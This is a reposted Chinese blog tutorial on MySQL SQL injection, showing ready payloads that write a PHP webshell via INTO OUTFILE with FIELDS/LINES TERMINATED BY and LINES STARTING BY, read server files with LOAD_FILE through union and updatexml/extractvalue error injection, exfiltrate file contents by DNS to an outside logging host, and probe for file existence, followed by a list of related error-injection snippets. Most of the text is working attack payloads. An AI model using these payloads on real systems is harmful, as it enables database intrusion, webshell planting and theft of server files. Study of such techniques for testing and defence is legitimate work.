2. 程式人生 > >報錯注入邂逅load_file&into outfile搭訕LINES

報錯注入邂逅load_file&into outfile搭訕LINES

阿新 發佈:2018-11-27

https://xz.aliyun.com/t/2460

0x00 前言

近期分析mysql利用報錯注入讀取檔案內容,利用LINES TERMINATED BY在查詢只返回一個欄位時寫webshell檔案,以及如何利用load_file掃描判斷檔案是否存在。

0x01 into outfile寫檔案

  • 要求使用者具有file許可權
  • 檔案不能覆蓋寫入,所以檔案必須為不存在
  • 如果secure_file_priv非空,則寫入檔案的目錄只能為對應目錄下

注意:

FIELDS TERMINATED BY原理為在輸出資料的每個欄位之間插入webshell內容,所以如果select返回的只有一個欄位,則寫入的檔案不包含webshell內容,例如下面語句SELECT username FROM user WHERE id = 1 into outfile 'D:/1.php' FIELDS TERMINATED BY 0x3c3f70687020706870696e666f28293b3f3e

,寫入的檔案中只包含username的值而沒有webshell內容;

LINES TERMINATED BY和LINES STARTING BY原理為在輸出每條記錄的結尾或開始處插入webshell內容,所以即使只查詢一個欄位也可以寫入webshell內容,更為通用。此外,該類方式可以引用於limit等不能union的語句之後進行寫檔案操作。

1. union注入寫檔案

SELECT * FROM user WHERE id = -1 union select 1,2,0x3c3f70687020706870696e666f28293b3f3e into outfile 'D:/1.php'

2. FIELDS TERMINATED BY(可在limit等語句後)

SELECT * FROM user WHERE id = 1 into outfile 'D:/1.php' fields terminated by 0x3c3f70687020706870696e666f28293b3f3e

3. LINES TERMINATED BY(可用於limit等sql注入)

SELECT username FROM user WHERE id = 1 into outfile 'D:/1.php' LINES TERMINATED BY 0x3c3f70687020706870696e666f28293b3f3e

4. LINES STARTING BY(可用於limit等sql注入)

SELECT username FROM user WHERE id = 1 into outfile 'D:/2.php' LINES STARTING  BY 0x3c3f70687020706870696e666f28293b3f3e

0x02 LOAD_FILE讀檔案

  • 要求使用者具有file許可權
  • 如果secure_file_priv非空,則只能讀取對應目錄下的檔案

1. 聯合注入+load_file讀檔案

SELECT * FROM user WHERE id=-1 UNION select 1,'1',(select load_file('D:/1.php'))

2. DNSLOG帶外查詢

  • 需要windows環境
SELECT id FROM user WHERE id = load_file (concat('\\\\',hex((select load_file('D:/1.php'))),'.t00ls.xxxxxxxxx.tu4.org\\a.txt'))

3. 報錯注入+load_file讀檔案

ps:報錯注入讀檔案內容,有時候會由於報錯長度受限或者檔案編碼問題,推薦採用hex編碼方式分段讀取檔案內容

select * from user  where username = '' and updatexml(0,concat(0x7e,(LOAD_FILE('D:/1.php')),0x7e),0)

  select * from user where id=1 and (extractvalue(1,concat(0x7e,(select (LOAD_FILE('D:/1.php'))),0x7e)))

某CMS報錯注入讀取檔案例項1:

某CMS報錯注入讀取檔案例項2:

0x03 掃描檔案是否存在

  • 要求使用者具有file許可權
  • 如果secure_file_priv非空,則只能掃描判斷對應目錄下的檔案

原理:
load_file讀取檔案時,如果沒有對應的許可權獲取或者檔案不存在則函式返回NULL,所以結合isnull+load_file可以掃描判斷檔名是否存在

如果檔案存在,isnull(load_file('檔名'))返回0
mysql> select * from user  where username = '' and updatexml(0,concat(0x7e,isnull(LOAD_FILE('D:/1.php')),0x7e),0);
ERROR 1105 (HY000): XPATH syntax error: '~0~'

如果檔案不存在isnull(load_file('檔名'))返回1
mysql> select * from user  where username = '' and updatexml(0,concat(0x7e,isnull(LOAD_FILE('D:/xxxxx')),0x7e),0);
ERROR 1105 (HY000): XPATH syntax error: '~1~'

某CMS報錯注入掃描檔案例項,存在檔案C:/Windows/win.ini

某CMS報錯注入掃描檔案例項,不存在檔案C:/Windows/passwd


可以結合burp爆破掃描檔名

0x04小結

  • 倘若知道絕對路徑且有許可權時,通常都是直接into outfile寫webshell
  • 不知道網站絕對路徑時,可以嘗試讀取常見的配置檔案獲取網站絕對路徑,然後進行寫操作;或者直接讀取敏感的檔案,獲取資訊進行其他操作。
  • 此外load_file可以在盲注情況下,利用DNSLOG帶外獲取內容,或者hex()函式轉換後按位讀取敏感的檔案內容
  • 還有很多的利用技巧,大家自行研究,多多分享

相關推薦

注入邂逅load_file&into outfile搭訕LINES

https://xz.aliyun.com/t/2460 0x00 前言 近期分析mysql利用報錯注入讀取檔案內容,利用LINES TERMINATED BY在查詢只返回一個欄位時寫webshell檔案,以及如何利用load_file掃描判斷檔案是否存在。 0x01 into outf

mysql load_file()和 into outfile

mysql服務器 init 數據導出 code httpd sel .com 12px host 0x00 load_file() 條件: 1. 要有file_priv權限 2. 知道文件絕對路徑 3. 能使用union 4. 對web目錄有讀權限 註:若過濾

SQL注入注入函式彙總

1.floor() id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a) 原理:https://b

實驗吧 加了料的注入

解題連結: http://ctf5.shiyanbar.com/web/baocuo/index.php SQL查詢原始碼: <!-- $sql="select * from users where username='$username' and password='$pass

Mysql注入簡單測試模型

測試Mysql環境:Mysql 5.7.12-log Mysql Community Server(GPL) 1、收集內建函式 http://dev.mysql.com/doc/refman/5.7/en/dynindex-function.html 2、整理列表 select A

sql注入注入原理解析

sql注入報錯注入原理詳解 前言 我相信很多小夥伴在玩sql注入報錯注入時都會有一個疑問,為什麼這麼寫就會報錯?曾經我去查詢的時候,也沒有找到滿意的答案,時隔幾個月終於找到搞清楚原理,特此記錄,也希望後來的小夥伴能夠少走彎路 0x01

注入各種語句

報錯注入 1、通過floor報錯,注入語句如下:   and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from inf

經典的MySQL Duplicate entry注入

SQL注射取資料的方式有多種: 利用union select查詢直接在頁面上返回資料,這種最為常見,一個前提是攻擊者能夠構造閉合的查詢。  Oracle中利用監聽UTL_HTTP.request發起的HTTP請求,把QuerySet反彈回攻擊者的主機。當然,HTTP伺

Mysql 注入的原理探索

我們一般使用的報錯語句: 1 select count(*),concat((select version()),floor(rand()*2))a from information_schema.tables group by a; concat:為聚合函式,連線字串功能

加了料的注入-實驗吧

去fuzz一下waf可以看到username不能用括號,然鵝password不能用floor,updatexml,polygon,multipoint,extractvalue,geometrycollection,multinestring,mulpolygon,lin

MySQL注入方法整理

mysql暴錯注入方法整理,通過floor,UpdateXml,ExtractValue,NAME_CONST,Error based Double Query Injection等方法。 報錯注入:(and後不能直接跟select,可以加()) 1.報錯注入floor-

實驗吧WP(web部分)【簡單的登入題,後臺登入,加了料的注入,認真一點,你真的會PHP嗎?】

一. 簡單的登入題這道題一點也不簡單,用到cbc位元組翻轉攻擊等技術,先跳過這題,想了解可看這裡。二. 後臺登入http://ctf5.shiyanbar.com/web/houtai/ffifdyop.php這道題給了一個登入框,第一反應是sql注入,提交了一個1上去後發現

sql注入例項

題目地址 bugku 多次 http://123.206.87.240:9004/ 本地有兩個部分,第一關的介面如下, 加上單引號出現報錯,再加上23%可以顯示正常的介面,發現過濾了很多的字元,在這裡用異或(^)的方式檢查過濾了哪些字元, 異或:當同時為真或者假的時候為假 然後就可以構造

SQL注入注入

第一類 group by 與 floor rand 函式的報錯 payload (select count(*) from (select 1 union select 2 union selec

Mysql注入原理分析(count()、rand()、group by)

可以看到floor(rand(0)*2)是有規律的,而且是固定的,這個就是上面提到的由於是確定性才導致的報錯,那為何會報錯呢,我們接著往下看。 0x05 count與group by的虛擬表 使用select count(*) from `T-Safe` group by x;這種語句的時候我們經

十種MySQL注入

以下均摘自《程式碼審計:企業級Web程式碼安全架構》一書 1.floor() select * from test where id=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*

SQL注入——聯合查詢和注入

1.別人可能用一個括號將要查詢的內容闊在一起了  可以使用)將其閉合2.還有人可能過濾掉了關鍵字可以使用如下方法anandd   selecselectt如果URL中把=號過濾掉了可以使用like進行模糊查詢報錯注入中sql裡 0x3a表示一個冒號具體用法and (selec

MYSQL高版本注入技巧-利用NAME_CONST注入

 and (select count(*) from mysql.user)>0/* 1、檢視MYSQL版本 and+exists(select*from+(select*from(select+name_const(@@version,0))a+join(select+name_const(

sql注入總結【積累中】

==========================第一次總結嘗試============================== 首先放一下測試的表 第一條報錯注入語句: select passwo

注入的一些整理 By Assassin

mysql暴錯注入方法整理,通過floor,UpdateXml,ExtractValue,NAME_CONST,Error based Double Query Injection等方法 SQL注入 1、通過floor暴錯 /資料庫版本/ http://